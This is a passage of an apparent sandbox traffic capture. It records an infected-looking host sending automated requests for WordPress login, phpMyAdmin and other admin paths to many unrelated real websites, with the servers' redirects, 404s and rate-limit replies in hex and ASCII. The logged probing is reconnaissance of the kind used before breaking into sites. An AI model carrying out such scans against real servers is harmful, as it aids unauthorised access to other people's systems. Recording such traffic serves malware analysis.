Feb 21, 2024 00:26:11.920790911 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/wp-login.php ETag: "65d0dd59-0"
Feb 21, 2024 00:26:12.743192911 CET	382	OUT	GET /wp-admin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://blauthlaw.com/wp-login.php
Feb 21, 2024 00:26:12.838324070 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/wp-admin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:13.065490007 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/wp-admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.6	60611	86.105.245.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.900456905 CET	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.074045897 CET	392	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 175 Connection: keep-alive Location: https://stylesense.co.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.6	60758	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.949642897 CET	181	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.077739954 CET	844	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/phpMyAdmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471571.9901479120410110454 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLk1Uxi5aVwrmRyfWZ8T7SgAMbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRalsTwqU4RI6WEQskWAgsLHFCe3/SScY6ACT7u6aWaxtKZPDFB/0chFXzBP0oLY++gmA==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,3+SKj2WaFkDLVdR9vyo8lJ/76x7/stiZn8lkJEBHkQI=,/j+AjfLiOiE0Vc9NsP8sK4wRwdsym/8rjzUP5A/qGmXyEPhhqrz5x6CGm56MeUd2/64sEjeNjExOBUpktkI8WA== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.6	59632	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.984471083 CET	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.291913033 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:12 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 35 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d Data Ascii: 556<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+[])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]
Feb 21, 2024 00:26:12.291925907 CET	427	IN	Data Raw: 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 Data Ascii: )+(+!+[]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);};
Feb 21, 2024 00:26:12.291939020 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.6	59699	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.999073029 CET	173	OUT	GET /admin.php HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.267535925 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.6	60839	13.248.243.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.007836103 CET	184	OUT	GET /wp-login.php HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.115216970 CET	320	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/wp-login.php vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:12 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:12.320020914 CET	320	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/wp-login.php vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:12 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:13.282474041 CET	235	OUT	GET /wp-admin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://strategicimpact.com.au/wp-login.php
Feb 21, 2024 00:26:13.379960060 CET	317	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/wp-admin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:13 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:13.588174105 CET	317	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/wp-admin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:13 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.6	60749	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.009978056 CET	172	OUT	GET /admin.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.168750048 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.6	60748	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.010147095 CET	172	OUT	GET /admin.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.169387102 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.6	60752	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.012765884 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.172532082 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.6	60750	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.012856960 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.172463894 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.6	60756	91.136.8.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.019090891 CET	165	OUT	GET /pma/ HTTP/1.1 Host: derbyron.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.186027050 CET	173	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 21 Connection: keep-alive Data Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.6	60751	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.030447006 CET	176	OUT	GET /pma/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.209273100 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.6	60802	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.043339968 CET	167	OUT	GET /pma/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.211806059 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
270	192.168.2.6	60940	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.083214045 CET	171	OUT	GET /admin.php HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.174580097 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:12 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: NXZrOsfs/G2YibHOY Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 